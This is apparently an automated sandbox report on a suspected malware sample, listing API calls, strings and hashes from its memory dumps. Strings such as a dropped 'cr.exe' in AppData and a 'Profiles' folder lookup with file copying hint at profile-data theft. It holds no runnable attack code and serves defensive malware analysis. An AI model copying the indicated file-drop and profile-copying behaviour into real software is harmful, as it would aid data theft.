                                                          • Instruction ID: 52929cc94302e98cbf51ad757ca836855f6015a6f755d450344f277f0a293595
                                                          • Opcode Fuzzy Hash: 7efd7ff150a9593777827fae617af71caa979b80934f4d148253df16b0b2ac34
                                                          • Instruction Fuzzy Hash: DEF01CB2610208BBEB109BB1DC89EEB7AACEF45251F100165E842E1111E6B4EE009A69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002D63D2
                                                          • GetLastError.KERNEL32(?,002D30CF,00000000,00000001,00000000,00000000,?,002C761B,00000000,002B5405,00000000,00000000,00000000,?,002C7B6F,00000000), ref: 002D63DE
                                                            • Part of subcall function 002D63A4: CloseHandle.KERNEL32(00488960), ref: 002D63B4
                                                          • ___initconout.LIBCMT ref: 002D63EE
                                                            • Part of subcall function 002D6366: CreateFileW.KERNEL32(00478770,40000000,00000003,00000000,00000003,00000000,00000000), ref: 002D6379
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 002D6403
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction ID: a510fe587eba8f53c25852aac4f2a5520c61ce78a74d20d9fd98e02d2fca20c8
                                                          • Opcode Fuzzy Hash: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction Fuzzy Hash: F4F03036411169BFCF225FD1DC489AD3F66FF097A0B114065FA18A6231DA328C309FD6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WriteConsoleW.KERNEL32 ref: 00466182
                                                          • GetLastError.KERNEL32(?,00462E7F,00000000,00000001,00000000,00000000,?,004573CB,00000000,004451B5,00000000,00000000,00000000,?,0045791F,00000000), ref: 0046618E
                                                            • Part of subcall function 00466154: CloseHandle.KERNEL32(FFFFFFFE), ref: 00466164
                                                          • ___initconout.LIBCMT ref: 0046619E
                                                            • Part of subcall function 00466116: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00466129
                                                          • WriteConsoleW.KERNEL32 ref: 004661B3
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction ID: 416dec9891203dc22651b9c7fb9a390e156cc2fca5e1046b62f2555eaa9ceec2
                                                          • Opcode Fuzzy Hash: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction Fuzzy Hash: 93F03736401159BFCF221FD1DC44DDE3F66FB053A0B054065F918A5132EA328820DBDA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0045459B
                                                            • Part of subcall function 00457A43: HeapFree.KERNEL32(00000000,00000000), ref: 00457A59
                                                            • Part of subcall function 00457A43: GetLastError.KERNEL32(?,?,00460E6B,?,00000000,?,00000002,?,0046110E,?,00000007,?,?,0046150F,?,?), ref: 00457A6B
                                                          • _free.LIBCMT ref: 004545AE
                                                          • _free.LIBCMT ref: 004545BF
                                                          • _free.LIBCMT ref: 004545D0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 2d59d81cd91aaabaf7c61607a25b77a9840330caacce95767aa868d436f6aa2b
                                                          • Instruction ID: d34e820f9dbc65aeedc8de5f007f3b93472046a6ea2c1d17c7705522547cb9d1
                                                          • Opcode Fuzzy Hash: 2d59d81cd91aaabaf7c61607a25b77a9840330caacce95767aa868d436f6aa2b
                                                          • Instruction Fuzzy Hash: B2E012B08849209AC602BF11FC8280D3EA3B744792301183FF81022636D73A1B129BFE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028BE92
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0028BEB6
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 0027902D: ___std_fs_copy_file@12.LIBCPMT ref: 00279051
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$EnvironmentFolderPathVariable___std_fs_copy_file@12
                                                          • String ID: Profiles
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Gard$ZoGard
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 002C261D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __startOneArgErrorHandling.LIBCMT ref: 004523CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorHandling__start
                                                          • String ID: pow
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlDecodePointer.NTDLL(00000000), ref: 002D5AAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: @$d/G
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\AppData\Roaming\cr.exe
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00416117
                                                            • Part of subcall function 00416242: __EH_prolog.LIBCMT ref: 00416247
                                                            • Part of subcall function 0041601F: __EH_prolog.LIBCMT ref: 00416024
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 00415FEA: std::exception::exception.LIBCONCRT ref: 0041600B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Deallocatestd::exception::exception
                                                          • String ID: parse error$parse_error
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002C6E7B: GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                            • Part of subcall function 002C6E7B: SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          • _free.LIBCMT ref: 002B50F6
                                                          • _free.LIBCMT ref: 002B511C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID: @
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$object != nullptr
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: ", "$: "
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00416247
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: DeallocateH_prolog
                                                          • String ID: at line $, column
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetLastError.KERNEL32(0000000D,?,0048CC64,?,002AE4DA,?,?,002774FD,00000000,?,0027FA2F,0048CC58,00410A63,0048CC64,00000016,002774FD), ref: 002AF2AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: @
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: @
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Unknown exception$ryF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: l#G
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 002AE85A
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 002AE8B5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                          • String ID: @
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002D067E: RtlEnterCriticalSection.NTDLL(00000000), ref: 002D0699
                                                          • FlushFileBuffers.KERNEL32(00000000), ref: 002C7170
                                                          • GetLastError.KERNEL32 ref: 002C7181
                                                          Strings
                                                          • G:\rc-build-v1-exe\json.hpp, xrefs: 002C7168
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                          • String ID: G:\rc-build-v1-exe\json.hpp
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00278FC1
                                                            • Part of subcall function 0027FC7B: __EH_prolog.LIBCMT ref: 0027FC80
                                                          Strings
                                                          • recursive_directory_iterator::recursive_directory_iterator, xrefs: 00278FFB
                                                          • izF, xrefs: 00278FBC
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: izF$recursive_directory_iterator::recursive_directory_iterator
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Unknown exception$ryF
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: G:\rc-build-v1-exe\json.hpp$object != nullptr
                                                          • API String ID: 3519838083-2100572481
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040E9DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: MA$e{@
                                                          • API String ID: 323602529-3135666671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040EA66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: ]A$e{@
                                                          • API String ID: 323602529-3711493409
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LCMapStringW.KERNEL32(00000000,?,00000001,?,00000003,?,?,?,002AF454,?,?,00000000,00000000,00000000,00000000), ref: 002AF619
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: String
                                                          • String ID: @$qOwv
                                                          • API String ID: 2568140703-1298692707
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027FBD9: __EH_prolog.LIBCMT ref: 0027FBDE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: directory_iterator::directory_iterator$izF
                                                          • API String ID: 3519838083-368197588
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 0028634D
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00286358
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@
                                                          • API String ID: 4194217158-2321748739
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 004160FD
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00416108
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@
                                                          • API String ID: 4194217158-2321748739
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 002AE638
                                                            • Part of subcall function 002861C1: std::exception::exception.LIBCONCRT ref: 002861CA
                                                            • Part of subcall function 002B2DA3: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000000,00488A38,?,002AE60B,00000000,004851C0,?), ref: 002B2E03
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ExceptionRaisestd::bad_exception::bad_exceptionstd::exception::exception
                                                          • String ID: bad function call$h8RH
                                                          • API String ID: 2640276836-2066287840
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0043E3E8
                                                            • Part of subcall function 00415F71: std::exception::exception.LIBCONCRT ref: 00415F7A
                                                            • Part of subcall function 00442B53: RaiseException.KERNEL32(E06D7363,00000001,00000003,00000000,?,?,0043E3BB,00000000,004851C0,?), ref: 00442BB3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ExceptionRaisestd::bad_exception::bad_exceptionstd::exception::exception
                                                          • String ID: bad function call$h8RH
                                                          • API String ID: 2640276836-2066287840
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 002843B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@$oAA
                                                          • API String ID: 4194217158-3931014327
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00283581
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@$=3A
                                                          • API String ID: 4194217158-2558485789
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 002828BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@$v&A
                                                          • API String ID: 4194217158-3540377896
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00283C66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: ":A$*q@
                                                          • API String ID: 4194217158-1598967937
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00294D67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: #KB$*q@
                                                          • API String ID: 4194217158-2129133441
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%